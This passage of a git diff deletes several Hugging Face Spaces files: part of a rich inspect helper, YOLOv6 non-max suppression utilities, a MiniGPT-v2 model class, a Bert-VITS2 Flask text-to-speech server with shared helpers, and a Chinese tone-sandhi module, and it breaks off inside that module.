if self.docs: - docs = self._get_formatted_doc(value) - if docs is not None: - _signature_text.append("\n" if "\n" in docs else " ") - doc = highlighter(docs) - doc.stylize("inspect.doc") - _signature_text.append(doc) - - add_row(key_text, _signature_text) - else: - add_row(key_text, Pretty(value, highlighter=highlighter)) - if items_table.row_count: - yield items_table - elif not_shown_count: - yield Text.from_markup( - f"[b cyan]{not_shown_count}[/][i] attribute(s) not shown.[/i] " - f"Run [b][magenta]inspect[/]([not b]inspect[/])[/b] for options." - ) - - def _get_formatted_doc(self, object_: Any) -> Optional[str]: - """ - Extract the docstring of an object, process it and returns it. - The processing consists in cleaning up the doctring's indentation, - taking only its 1st paragraph if `self.help` is not True, - and escape its control codes. - - Args: - object_ (Any): the object to get the docstring from. - - Returns: - Optional[str]: the processed docstring, or None if no docstring was found. - """ - docs = getdoc(object_) - if docs is None: - return None - docs = cleandoc(docs).strip() - if not self.help: - docs = _first_paragraph(docs) - return escape_control_codes(docs) - - -def get_object_types_mro(obj: Union[object, Type[Any]]) -> Tuple[type, ...]: - """Returns the MRO of an object's class, or of the object itself if it's a class.""" - if not hasattr(obj, "__mro__"): - # N.B. we cannot use `if type(obj) is type` here because it doesn't work with - # some types of classes, such as the ones that use abc.ABCMeta. - obj = type(obj) - return getattr(obj, "__mro__", ()) - - -def get_object_types_mro_as_strings(obj: object) -> Collection[str]: - """ - Returns the MRO of an object's class as full qualified names, or of the object itself if it's a class. - - Examples: - `object_types_mro_as_strings(JSONDecoder)` will return `['json.decoder.JSONDecoder', 'builtins.object']` - """ - return [ - f'{getattr(type_, "__module__", "")}.{getattr(type_, "__qualname__", "")}' - for type_ in get_object_types_mro(obj) - ] - - -def is_object_one_of_types( - obj: object, fully_qualified_types_names: Collection[str] -) -> bool: - """ - Returns `True` if the given object's class (or the object itself, if it's a class) has one of the - fully qualified names in its MRO. - """ - for type_name in get_object_types_mro_as_strings(obj): - if type_name in fully_qualified_types_names: - return True - return False diff --git a/spaces/Theivaprakasham/yolov6/yolov6/utils/nms.py b/spaces/Theivaprakasham/yolov6/yolov6/utils/nms.py deleted file mode 100644 index 9c61b7cc4567b03cd2977b505b89c76e0e1d6769..0000000000000000000000000000000000000000 --- a/spaces/Theivaprakasham/yolov6/yolov6/utils/nms.py +++ /dev/null @@ -1,106 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- -# The code is based on -# https://github.com/ultralytics/yolov5/blob/master/utils/general.py - -import os -import time -import numpy as np -import cv2 -import torch -import torchvision - - -# Settings -torch.set_printoptions(linewidth=320, precision=5, profile='long') -np.set_printoptions(linewidth=320, formatter={'float_kind': '{:11.5g}'.format}) # format short g, %precision=5 -cv2.setNumThreads(0) # prevent OpenCV from multithreading (incompatible with PyTorch DataLoader) -os.environ['NUMEXPR_MAX_THREADS'] = str(min(os.cpu_count(), 8)) # NumExpr max threads - - -def xywh2xyxy(x): - # Convert boxes with shape [n, 4] from [x, y, w, h] to [x1, y1, x2, y2] where x1y1 is top-left, x2y2=bottom-right - y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) - y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x - y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y - y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x - y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y - return y - - -def non_max_suppression(prediction, conf_thres=0.25, iou_thres=0.45, classes=None, agnostic=False, multi_label=False, max_det=300): - """Runs Non-Maximum Suppression (NMS) on inference results. - This code is borrowed from: https://github.com/ultralytics/yolov5/blob/47233e1698b89fc437a4fb9463c815e9171be955/utils/general.py#L775 - Args: - prediction: (tensor), with shape [N, 5 + num_classes], N is the number of bboxes. - conf_thres: (float) confidence threshold. - iou_thres: (float) iou threshold. - classes: (None or list[int]), if a list is provided, nms only keep the classes you provide. - agnostic: (bool), when it is set to True, we do class-independent nms, otherwise, different class would do nms respectively. - multi_label: (bool), when it is set to True, one box can have multi labels, otherwise, one box only huave one label. - max_det:(int), max number of output bboxes. - - Returns: - list of detections, echo item is one tensor with shape (num_boxes, 6), 6 is for [xyxy, conf, cls]. - """ - - num_classes = prediction.shape[2] - 5 # number of classes - pred_candidates = prediction[..., 4] > conf_thres # candidates - - # Check the parameters. - assert 0 <= conf_thres <= 1, f'conf_thresh must be in 0.0 to 1.0, however {conf_thres} is provided.' - assert 0 <= iou_thres <= 1, f'iou_thres must be in 0.0 to 1.0, however {iou_thres} is provided.' - - # Function settings. - max_wh = 4096 # maximum box width and height - max_nms = 30000 # maximum number of boxes put into torchvision.ops.nms() - time_limit = 10.0 # quit the function when nms cost time exceed the limit time. - multi_label &= num_classes > 1 # multiple labels per box - - tik = time.time() - output = [torch.zeros((0, 6), device=prediction.device)] * prediction.shape[0] - for img_idx, x in enumerate(prediction): # image index, image inference - x = x[pred_candidates[img_idx]] # confidence - - # If no box remains, skip the next process. - if not x.shape[0]: - continue - - # confidence multiply the objectness - x[:, 5:] *= x[:, 4:5] # conf = obj_conf * cls_conf - - # (center x, center y, width, height) to (x1, y1, x2, y2) - box = xywh2xyxy(x[:, :4]) - - # Detections matrix's shape is (n,6), each row represents (xyxy, conf, cls) - if multi_label: - box_idx, class_idx = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T - x = torch.cat((box[box_idx], x[box_idx, class_idx + 5, None], class_idx[:, None].float()), 1) - else: # Only keep the class with highest scores. - conf, class_idx = x[:, 5:].max(1, keepdim=True) - x = torch.cat((box, conf, class_idx.float()), 1)[conf.view(-1) > conf_thres] - - # Filter by class, only keep boxes whose category is in classes. - if classes is not None: - x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)] - - # Check shape - num_box = x.shape[0] # number of boxes - if not num_box: # no boxes kept. - continue - elif num_box > max_nms: # excess max boxes' number. - x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence - - # Batched NMS - class_offset = x[:, 5:6] * (0 if agnostic else max_wh) # classes - boxes, scores = x[:, :4] + class_offset, x[:, 4] # boxes (offset by class), scores - keep_box_idx = torchvision.ops.nms(boxes, scores, iou_thres) # NMS - if keep_box_idx.shape[0] > max_det: # limit detections - keep_box_idx = keep_box_idx[:max_det] - - output[img_idx] = x[keep_box_idx] - if (time.time() - tik) > time_limit: - print(f'WARNING: NMS cost time exceed the limited {time_limit}s.') - break # time limit exceeded - - return output diff --git a/spaces/Vision-CAIR/MiniGPT-v2/minigpt4/models/minigpt_v2.py b/spaces/Vision-CAIR/MiniGPT-v2/minigpt4/models/minigpt_v2.py deleted file mode 100644 index a046b0baff41db50477e35904af9bcad5baa619c..0000000000000000000000000000000000000000 --- a/spaces/Vision-CAIR/MiniGPT-v2/minigpt4/models/minigpt_v2.py +++ /dev/null @@ -1,139 +0,0 @@ -import logging -import random - -import torch -from torch.cuda.amp import autocast as autocast -import torch.nn as nn - -from minigpt4.common.registry import registry -from minigpt4.models.base_model import disabled_train -from minigpt4.models.minigpt_base import MiniGPTBase -from minigpt4.models.Qformer import BertConfig, BertLMHeadModel - - -@registry.register_model("minigpt_v2") -class MiniGPTv2(MiniGPTBase): - """ - MiniGPT-v2 model - """ - - PRETRAINED_MODEL_CONFIG_DICT = { - "pretrain": "configs/models/minigpt_v2.yaml", - } - - def __init__( - self, - vit_model="eva_clip_g", - img_size=448, - drop_path_rate=0, - use_grad_checkpoint=False, - vit_precision="fp16", - freeze_vit=True, - llama_model="", - prompt_template='[INST] {} [/INST]', - max_txt_len=300, - end_sym='\n', - lora_r=64, - lora_target_modules=["q_proj", "v_proj"], - lora_alpha=16, - lora_dropout=0.05, - chat_template=False, - use_grad_checkpoint_llm=False, - max_context_len=3800, - low_resource=False, # use 8 bit and put vit in cpu - device_8bit=0, # the device of 8bit model should be set when loading and cannot be changed anymore. - ): - super().__init__( - vit_model=vit_model, - img_size=img_size, - drop_path_rate=drop_path_rate, - use_grad_checkpoint=use_grad_checkpoint, - vit_precision=vit_precision, - freeze_vit=freeze_vit, - llama_model=llama_model, - max_txt_len=max_txt_len, - max_context_len=max_context_len, - end_sym=end_sym, - prompt_template=prompt_template, - low_resource=low_resource, - device_8bit=device_8bit, - lora_r=lora_r, - lora_target_modules=lora_target_modules, - lora_alpha=lora_alpha, - lora_dropout=lora_dropout, - ) - - img_f_dim = self.visual_encoder.num_features * 4 - self.llama_proj = nn.Linear( - img_f_dim, self.llama_model.config.hidden_size - ) - self.chat_template = chat_template - - if use_grad_checkpoint_llm: - self.llama_model.gradient_checkpointing_enable() - - def encode_img(self, image): - device = image.device - - if len(image.shape) > 4: - image = image.reshape(-1, *image.shape[-3:]) - - with self.maybe_autocast(): - image_embeds = self.ln_vision(self.visual_encoder(image)).to(device) - image_embeds = image_embeds[:, 1:, :] - bs, pn, hs = image_embeds.shape - image_embeds = image_embeds.view(bs, int(pn / 4), int(hs * 4)) - - inputs_llama = self.llama_proj(image_embeds) - atts_llama = torch.ones(inputs_llama.size()[:-1], dtype=torch.long).to(image.device) - return inputs_llama, atts_llama - - @classmethod - def from_config(cls, cfg): - vit_model = cfg.get("vit_model", "eva_clip_g") - img_size = cfg.get("image_size") - llama_model = cfg.get("llama_model") - - drop_path_rate = cfg.get("drop_path_rate", 0) - use_grad_checkpoint = cfg.get("use_grad_checkpoint", False) - vit_precision = cfg.get("vit_precision", "fp16") - freeze_vit = cfg.get("freeze_vit", True) - low_resource = cfg.get("low_resource", False) - - prompt_template = cfg.get("prompt_template", '[INST] {} [/INST]') - max_txt_len = cfg.get("max_txt_len", 300) - end_sym = cfg.get("end_sym", '\n') - - lora_r = cfg.get("lora_r", 64) - lora_alpha = cfg.get("lora_alpha", 16) - chat_template = cfg.get("chat_template", False) - - use_grad_checkpoint_llm = cfg.get("use_grad_checkpoint_llm", False) - max_context_len = cfg.get("max_context_len", 3800) - - model = cls( - vit_model=vit_model, - img_size=img_size, - drop_path_rate=drop_path_rate, - use_grad_checkpoint=use_grad_checkpoint, - vit_precision=vit_precision, - freeze_vit=freeze_vit, - llama_model=llama_model, - prompt_template=prompt_template, - max_txt_len=max_txt_len, - low_resource=low_resource, - end_sym=end_sym, - lora_r=lora_r, - lora_alpha=lora_alpha, - chat_template=chat_template, - use_grad_checkpoint_llm=use_grad_checkpoint_llm, - max_context_len=max_context_len, - ) - - ckpt_path = cfg.get("ckpt", "") # load weights of MiniGPT-4 - if ckpt_path: - print("Load Minigpt-4-LLM Checkpoint: {}".format(ckpt_path)) - ckpt = torch.load(ckpt_path, map_location="cpu") - msg = model.load_state_dict(ckpt['model'], strict=False) - - return model diff --git a/spaces/Volkopat/SegmentAnythingxGroundingDINO/groundingdino/config/__init__.py b/spaces/Volkopat/SegmentAnythingxGroundingDINO/groundingdino/config/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/XiNiu/XSpace/README.md b/spaces/XiNiu/XSpace/README.md deleted file mode 100644 index 7c5b224c4956da4566e3a4591dc818ee556c0d5d..0000000000000000000000000000000000000000 --- a/spaces/XiNiu/XSpace/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: XSpace -emoji: ⚡ -colorFrom: green -colorTo: yellow -sdk: gradio -sdk_version: 3.35.2 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/XzJosh/Aatrox-Bert-VITS2/server.py b/spaces/XzJosh/Aatrox-Bert-VITS2/server.py deleted file mode 100644 index c736ca4f95fec853950eef6654ef79856beffc0a..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Aatrox-Bert-VITS2/server.py +++ /dev/null @@ -1,123 +0,0 @@ -from flask import Flask, request, Response -from io import BytesIO -import torch -from av import open as avopen - -import commons -import utils -from models import SynthesizerTrn -from text.symbols import symbols -from text import cleaned_text_to_sequence, get_bert -from text.cleaner import clean_text -from scipy.io import wavfile - -# Flask Init -app = Flask(__name__) -app.config['JSON_AS_ASCII'] = False -def get_text(text, language_str, hps): - norm_text, phone, tone, word2ph = clean_text(text, language_str) - print([f"{p}{t}" for p, t in zip(phone, tone)]) - phone, tone, language = cleaned_text_to_sequence(phone, tone, language_str) - - if hps.data.add_blank: - phone = commons.intersperse(phone, 0) - tone = commons.intersperse(tone, 0) - language = commons.intersperse(language, 0) - for i in range(len(word2ph)): - word2ph[i] = word2ph[i] * 2 - word2ph[0] += 1 - bert = get_bert(norm_text, word2ph, language_str) - - assert bert.shape[-1] == len(phone) - - phone = torch.LongTensor(phone) - tone = torch.LongTensor(tone) - language = torch.LongTensor(language) - - return bert, phone, tone, language - -def infer(text, sdp_ratio, noise_scale, noise_scale_w,length_scale,sid): - bert, phones, tones, lang_ids = get_text(text,"ZH", hps,) - with torch.no_grad(): - x_tst=phones.to(dev).unsqueeze(0) - tones=tones.to(dev).unsqueeze(0) - lang_ids=lang_ids.to(dev).unsqueeze(0) - bert = bert.to(dev).unsqueeze(0) - x_tst_lengths = torch.LongTensor([phones.size(0)]).to(dev) - speakers = torch.LongTensor([hps.data.spk2id[sid]]).to(dev) - audio = net_g.infer(x_tst, x_tst_lengths, speakers, tones, lang_ids,bert, sdp_ratio=sdp_ratio - , noise_scale=noise_scale, noise_scale_w=noise_scale_w, length_scale=length_scale)[0][0,0].data.cpu().float().numpy() - return audio - -def replace_punctuation(text, i=2): - punctuation = ",。?!" - for char in punctuation: - text = text.replace(char, char * i) - return text - -def wav2(i, o, format): - inp = avopen(i, 'rb') - out = avopen(o, 'wb', format=format) - if format == "ogg": format = "libvorbis" - - ostream = out.add_stream(format) - - for frame in inp.decode(audio=0): - for p in ostream.encode(frame): out.mux(p) - - for p in ostream.encode(None): out.mux(p) - - out.close() - inp.close() - -# Load Generator -hps = utils.get_hparams_from_file("./configs/config.json") - -dev='cuda' -net_g = SynthesizerTrn( - len(symbols), - hps.data.filter_length // 2 + 1, - hps.train.segment_size // hps.data.hop_length, - n_speakers=hps.data.n_speakers, - **hps.model).to(dev) -_ = net_g.eval() - -_ = utils.load_checkpoint("logs/G_649000.pth", net_g, None,skip_optimizer=True) - -@app.route("/",methods=['GET','POST']) -def main(): - if request.method == 'GET': - try: - speaker = request.args.get('speaker') - text = request.args.get('text').replace("/n","") - sdp_ratio = float(request.args.get("sdp_ratio", 0.2)) - noise = float(request.args.get("noise", 0.5)) - noisew = float(request.args.get("noisew", 0.6)) - length = float(request.args.get("length", 1.2)) - if length >= 2: - return "Too big length" - if len(text) >=200: - return "Too long text" - fmt = request.args.get("format", "wav") - if None in (speaker, text): - return "Missing Parameter" - if fmt not in ("mp3", "wav", "ogg"): - return "Invalid Format" - except: - return "Invalid Parameter" - - with torch.no_grad(): - audio = infer(text, sdp_ratio=sdp_ratio, noise_scale=noise, noise_scale_w=noisew, length_scale=length, sid=speaker) - - with BytesIO() as wav: - wavfile.write(wav, hps.data.sampling_rate, audio) - torch.cuda.empty_cache() - if fmt == "wav": - return Response(wav.getvalue(), mimetype="audio/wav") - wav.seek(0, 0) - with BytesIO() as ofp: - wav2(wav, ofp, fmt) - return Response( - ofp.getvalue(), - mimetype="audio/mpeg" if fmt == "mp3" else "audio/ogg" - ) diff --git a/spaces/XzJosh/Azusa-Bert-VITS2/commons.py b/spaces/XzJosh/Azusa-Bert-VITS2/commons.py deleted file mode 100644 index 9ad0444b61cbadaa388619986c2889c707d873ce..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Azusa-Bert-VITS2/commons.py +++ /dev/null @@ -1,161 +0,0 @@ -import math -import numpy as np -import torch -from torch import nn -from torch.nn import functional as F - - -def init_weights(m, mean=0.0, std=0.01): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - m.weight.data.normal_(mean, std) - - -def get_padding(kernel_size, dilation=1): - return int((kernel_size*dilation - dilation)/2) - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def intersperse(lst, item): - result = [item] * (len(lst) * 2 + 1) - result[1::2] = lst - return result - - -def kl_divergence(m_p, logs_p, m_q, logs_q): - """KL(P||Q)""" - kl = (logs_q - logs_p) - 0.5 - kl += 0.5 * (torch.exp(2. * logs_p) + ((m_p - m_q)**2)) * torch.exp(-2. * logs_q) - return kl - - -def rand_gumbel(shape): - """Sample from the Gumbel distribution, protect from overflows.""" - uniform_samples = torch.rand(shape) * 0.99998 + 0.00001 - return -torch.log(-torch.log(uniform_samples)) - - -def rand_gumbel_like(x): - g = rand_gumbel(x.size()).to(dtype=x.dtype, device=x.device) - return g - - -def slice_segments(x, ids_str, segment_size=4): - ret = torch.zeros_like(x[:, :, :segment_size]) - for i in range(x.size(0)): - idx_str = ids_str[i] - idx_end = idx_str + segment_size - ret[i] = x[i, :, idx_str:idx_end] - return ret - - -def rand_slice_segments(x, x_lengths=None, segment_size=4): - b, d, t = x.size() - if x_lengths is None: - x_lengths = t - ids_str_max = x_lengths - segment_size + 1 - ids_str = (torch.rand([b]).to(device=x.device) * ids_str_max).to(dtype=torch.long) - ret = slice_segments(x, ids_str, segment_size) - return ret, ids_str - - -def get_timing_signal_1d( - length, channels, min_timescale=1.0, max_timescale=1.0e4): - position = torch.arange(length, dtype=torch.float) - num_timescales = channels // 2 - log_timescale_increment = ( - math.log(float(max_timescale) / float(min_timescale)) / - (num_timescales - 1)) - inv_timescales = min_timescale * torch.exp( - torch.arange(num_timescales, dtype=torch.float) * -log_timescale_increment) - scaled_time = position.unsqueeze(0) * inv_timescales.unsqueeze(1) - signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)], 0) - signal = F.pad(signal, [0, 0, 0, channels % 2]) - signal = signal.view(1, channels, length) - return signal - - -def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return x + signal.to(dtype=x.dtype, device=x.device) - - -def cat_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4, axis=1): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return torch.cat([x, signal.to(dtype=x.dtype, device=x.device)], axis) - - -def subsequent_mask(length): - mask = torch.tril(torch.ones(length, length)).unsqueeze(0).unsqueeze(0) - return mask - - -@torch.jit.script -def fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels): - n_channels_int = n_channels[0] - in_act = input_a + input_b - t_act = torch.tanh(in_act[:, :n_channels_int, :]) - s_act = torch.sigmoid(in_act[:, n_channels_int:, :]) - acts = t_act * s_act - return acts - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def shift_1d(x): - x = F.pad(x, convert_pad_shape([[0, 0], [0, 0], [1, 0]]))[:, :, :-1] - return x - - -def sequence_mask(length, max_length=None): - if max_length is None: - max_length = length.max() - x = torch.arange(max_length, dtype=length.dtype, device=length.device) - return x.unsqueeze(0) < length.unsqueeze(1) - - -def generate_path(duration, mask): - """ - duration: [b, 1, t_x] - mask: [b, 1, t_y, t_x] - """ - device = duration.device - - b, _, t_y, t_x = mask.shape - cum_duration = torch.cumsum(duration, -1) - - cum_duration_flat = cum_duration.view(b * t_x) - path = sequence_mask(cum_duration_flat, t_y).to(mask.dtype) - path = path.view(b, t_x, t_y) - path = path - F.pad(path, convert_pad_shape([[0, 0], [1, 0], [0, 0]]))[:, :-1] - path = path.unsqueeze(1).transpose(2,3) * mask - return path - - -def clip_grad_value_(parameters, clip_value, norm_type=2): - if isinstance(parameters, torch.Tensor): - parameters = [parameters] - parameters = list(filter(lambda p: p.grad is not None, parameters)) - norm_type = float(norm_type) - if clip_value is not None: - clip_value = float(clip_value) - - total_norm = 0 - for p in parameters: - param_norm = p.grad.data.norm(norm_type) - total_norm += param_norm.item() ** norm_type - if clip_value is not None: - p.grad.data.clamp_(min=-clip_value, max=clip_value) - total_norm = total_norm ** (1. / norm_type) - return total_norm diff --git a/spaces/XzJosh/Diana-Bert-VITS2/text/tone_sandhi.py b/spaces/XzJosh/Diana-Bert-VITS2/text/tone_sandhi.py deleted file mode 100644 index 0f45b7a72c5d858bcaab19ac85cfa686bf9a74da..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Diana-Bert-VITS2/text/tone_sandhi.py +++ /dev/null @@ -1,351 +0,0 @@ -# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -from typing import List -from typing import Tuple - -import jieba -from pypinyin import lazy_pinyin -from pypinyin import Style - - -class ToneSandhi(): - def __init__(self): - self.must_neural_tone_words = { - '麻烦', '麻利', '鸳鸯', '高粱', '骨头', '骆驼', '马虎', '首饰', '馒头', '馄饨', '风筝', - '难为', '队伍', '阔气', '闺女', '门道', '锄头', '铺盖', '铃铛', '铁匠', '钥匙', '里脊', - '里头', '部分', '那么', '道士', '造化', '迷糊', '连累', '这么', '这个', '运气', '过去', - '软和', '转悠', '踏实', '跳蚤', '跟头', '趔趄', '财主', '豆腐', '讲究', '记性', '记号', - '认识', '规矩', '见识', '裁缝', '补丁', '衣裳', '衣服', '衙门', '街坊', '行李', '行当', - '蛤蟆', '蘑菇', '薄荷', '葫芦', '葡萄', '萝卜', '荸荠', '苗条', '苗头', '苍蝇', '芝麻', - '舒服', '舒坦', '舌头', '自在', '膏药', '脾气', '脑袋', '脊梁', '能耐', '胳膊', '胭脂', - '胡萝', '胡琴', '胡同', '聪明', '耽误', '耽搁', '耷拉', '耳朵', '老爷', '老实', '老婆', - '老头', '老太', '翻腾', '罗嗦', '罐头', '编辑', '结实', '红火', '累赘', '糨糊', '糊涂', - '精神', '粮食', '簸箕', '篱笆', '算计', '算盘', '答应', '笤帚', '笑语', '笑话', '窟窿', - '窝囊', '窗户', '稳当', '稀罕', '称呼', '秧歌', '秀气', '秀才', '福气', '祖宗', '砚台', - '码头', '石榴', '石头', '石匠', '知识', '眼睛', '眯缝', '眨巴', '眉毛', '相声', '盘算', - '白净', '痢疾', '痛快', '疟疾', '疙瘩', '疏忽', '畜生', '生意', '甘蔗', '琵琶', '琢磨', - '琉璃', '玻璃', '玫瑰', '玄乎', '狐狸', '状元', '特务', '牲口', '牙碜', '牌楼', '爽快', - '爱人', '热闹', '烧饼', '烟筒', '烂糊', '点心', '炊帚', '灯笼', '火候', '漂亮', '滑溜', - '溜达', '温和', '清楚', '消息', '浪头', '活泼', '比方', '正经', '欺负', '模糊', '槟榔', - '棺材', '棒槌', '棉花', '核桃', '栅栏', '柴火', '架势', '枕头', '枇杷', '机灵', '本事', - '木头', '木匠', '朋友', '月饼', '月亮', '暖和', '明白', '时候', '新鲜', '故事', '收拾', - '收成', '提防', '挖苦', '挑剔', '指甲', '指头', '拾掇', '拳头', '拨弄', '招牌', '招呼', - '抬举', '护士', '折腾', '扫帚', '打量', '打算', '打点', '打扮', '打听', '打发', '扎实', - '扁担', '戒指', '懒得', '意识', '意思', '情形', '悟性', '怪物', '思量', '怎么', '念头', - '念叨', '快活', '忙活', '志气', '心思', '得罪', '张罗', '弟兄', '开通', '应酬', '庄稼', - '干事', '帮手', '帐篷', '希罕', '师父', '师傅', '巴结', '巴掌', '差事', '工夫', '岁数', - '屁股', '尾巴', '少爷', '小气', '小伙', '将就', '对头', '对付', '寡妇', '家伙', '客气', - '实在', '官司', '学问', '学生', '字号', '嫁妆', '媳妇', '媒人', '婆家', '娘家', '委屈', - '姑娘', '姐夫', '妯娌', '妥当', '妖精', '奴才', '女婿', '头发', '太阳', '大爷', '大方', - '大意', '大夫', '多少', '多么', '外甥', '壮实', '地道', '地方', '在乎', '困难', '嘴巴', - '嘱咐', '嘟囔', '嘀咕', '喜欢', '喇嘛', '喇叭', '商量', '唾沫', '哑巴', '哈欠', '哆嗦', - '咳嗽', '和尚', '告诉', '告示', '含糊', '吓唬', '后头', '名字', '名堂', '合同', '吆喝', - '叫唤', '口袋', '厚道', '厉害', '千斤', '包袱', '包涵', '匀称', '勤快', '动静', '动弹', - '功夫', '力气', '前头', '刺猬', '刺激', '别扭', '利落', '利索', '利害', '分析', '出息', - '凑合', '凉快', '冷战', '冤枉', '冒失', '养活', '关系', '先生', '兄弟', '便宜', '使唤', - '佩服', '作坊', '体面', '位置', '似的', '伙计', '休息', '什么', '人家', '亲戚', '亲家', - '交情', '云彩', '事情', '买卖', '主意', '丫头', '丧气', '两口', '东西', '东家', '世故', - '不由', '不在', '下水', '下巴', '上头', '上司', '丈夫', '丈人', '一辈', '那个', '菩萨', - '父亲', '母亲', '咕噜', '邋遢', '费用', '冤家', '甜头', '介绍', '荒唐', '大人', '泥鳅', - '幸福', '熟悉', '计划', '扑腾', '蜡烛', '姥爷', '照顾', '喉咙', '吉他', '弄堂', '蚂蚱', - '凤凰', '拖沓', '寒碜', '糟蹋', '倒腾', '报复', '逻辑', '盘缠', '喽啰', '牢骚', '咖喱', - '扫把', '惦记' - } - self.must_not_neural_tone_words = { - "男子", "女子", "分子", "原子", "量子", "莲子", "石子", "瓜子", "电子", "人人", "虎虎" - } - self.punc = ":,;。?!“”‘’':,;.?!" - - # the meaning of jieba pos tag: https://blog.csdn.net/weixin_44174352/article/details/113731041 - # e.g. - # word: "家里" - # pos: "s" - # finals: ['ia1', 'i3'] - def _neural_sandhi(self, word: str, pos: str, - finals: List[str]) -> List[str]: - - # reduplication words for n. and v. e.g. 奶奶, 试试, 旺旺 - for j, item in enumerate(word): - if j - 1 >= 0 and item == word[j - 1] and pos[0] in { - "n", "v", "a" - } and word not in self.must_not_neural_tone_words: - finals[j] = finals[j][:-1] + "5" - ge_idx = word.find("个") - if len(word) >= 1 and word[-1] in "吧呢啊呐噻嘛吖嗨呐哦哒额滴哩哟喽啰耶喔诶": - finals[-1] = finals[-1][:-1] + "5" - elif len(word) >= 1 and word[-1] in "的地得": - finals[-1] = finals[-1][:-1] + "5" - # e.g. 走了, 看着, 去过 - # elif len(word) == 1 and word in "了着过" and pos in {"ul", "uz", "ug"}: - # finals[-1] = finals[-1][:-1] + "5" - elif len(word) > 1 and word[-1] in "们子" and pos in { - "r", "n" - } and word not in self.must_not_neural_tone_words: - finals[-1] = finals[-1][:-1] + "5" - # e.g. 桌上, 地下, 家里 - elif len(word) > 1 and word[-1] in "上下里" and pos in {"s", "l", "f"}: - finals[-1] = finals[-1][:-1] + "5" - # e.g. 上来, 下去 - elif len(word) > 1 and word[-1] in "来去" and word[-2] in "上下进出回过起开": - finals[-1] = finals[-1][:-1] + "5" - # 个做量词 - elif (ge_idx >= 1 and - (word[ge_idx - 1].isnumeric() or - word[ge_idx - 1] in "几有两半多各整每做是")) or word == '个': - finals[ge_idx] = finals[ge_idx][:-1] + "5" - else: - if word in self.must_neural_tone_words or word[ - -2:] in self.must_neural_tone_words: - finals[-1] = finals[-1][:-1] + "5" - - word_list = self._split_word(word) - finals_list = [finals[:len(word_list[0])], finals[len(word_list[0]):]] - for i, word in enumerate(word_list): - # conventional neural in Chinese - if word in self.must_neural_tone_words or word[ - -2:] in self.must_neural_tone_words: - finals_list[i][-1] = finals_list[i][-1][:-1] + "5" - finals = sum(finals_list, []) - return finals - - def _bu_sandhi(self, word: str, finals: List[str]) -> List[str]: - # e.g. 看不懂 - if len(word) == 3 and word[1] == "不": - finals[1] = finals[1][:-1] + "5" - else: - for i, char in enumerate(word): - # "不" before tone4 should be bu2, e.g. 不怕 - if char == "不" and i + 1 < len(word) and finals[i + - 1][-1] == "4": - finals[i] = finals[i][:-1] + "2" - return finals - - def _yi_sandhi(self, word: str, finals: List[str]) -> List[str]: - # "一" in number sequences, e.g. 一零零, 二一零 - if word.find("一") != -1 and all( - [item.isnumeric() for item in word if item != "一"]): - return finals - # "一" between reduplication words shold be yi5, e.g. 看一看 - elif len(word) == 3 and word[1] == "一" and word[0] == word[-1]: - finals[1] = finals[1][:-1] + "5" - # when "一" is ordinal word, it should be yi1 - elif word.startswith("第一"): - finals[1] = finals[1][:-1] + "1" - else: - for i, char in enumerate(word): - if char == "一" and i + 1 < len(word): - # "一" before tone4 should be yi2, e.g. 一段 - if finals[i + 1][-1] == "4": - finals[i] = finals[i][:-1] + "2" - # "一" before non-tone4 should be yi4, e.g. 一天 - else: - # "一" 后面如果是标点,还读一声 - if word[i + 1] not in self.punc: - finals[i] = finals[i][:-1] + "4" - return finals - - def _split_word(self, word: str) -> List[str]: - word_list = jieba.cut_for_search(word) - word_list = sorted(word_list, key=lambda i: len(i), reverse=False) - first_subword = word_list[0] - first_begin_idx = word.find(first_subword) - if first_begin_idx == 0: - second_subword = word[len(first_subword):] - new_word_list = [first_subword, second_subword] - else: - second_subword = word[:-len(first_subword)] - new_word_list = [second_subword, first_subword] - return new_word_list - - def _three_sandhi(self, word: str, finals: List[str]) -> List[str]: - if len(word) == 2 and self._all_tone_three(finals): - finals[0] = finals[0][:-1] + "2" - elif len(word) == 3: - word_list = self._split_word(word) - if self._all_tone_three(finals): - # disyllabic + monosyllabic, e.g. 蒙古/包 - if len(word_list[0]) == 2: - finals[0] = finals[0][:-1] + "2" - finals[1] = finals[1][:-1] + "2" - # monosyllabic + disyllabic, e.g. 纸/老虎 - elif len(word_list[0]) == 1: - finals[1] = finals[1][:-1] + "2" - else: - finals_list = [ - finals[:len(word_list[0])], finals[len(word_list[0]):] - ] - if len(finals_list) == 2: - for i, sub in enumerate(finals_list): - # e.g. 